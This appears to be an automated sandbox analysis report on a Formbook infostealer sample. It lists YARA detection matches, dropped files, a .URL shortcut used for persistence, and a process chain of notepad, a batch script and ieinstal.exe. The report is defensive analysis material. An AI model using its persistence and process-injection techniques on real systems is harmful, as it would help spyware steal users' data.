Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.218533386.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.218413577.0000000002358000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000013.00000003.326806976.0000000004B7C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPED | Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
        Source: C:\Windows\SysWOW64\notepad.exeCode function: 2_2_5048784E GetDiskFreeSpaceA,2_2_5048784E
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile created: C:\Users\user\AppData\Local\Mqbmnet.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Mqbmupv_Signed_.exeVirustotal: Detection: 27%
        Source: Mqbmupv_Signed_.exeReversingLabs: Detection: 45%
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Users\user\Desktop\Mqbmupv_Signed_.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Mqbmupv_Signed_.exe 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exeJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'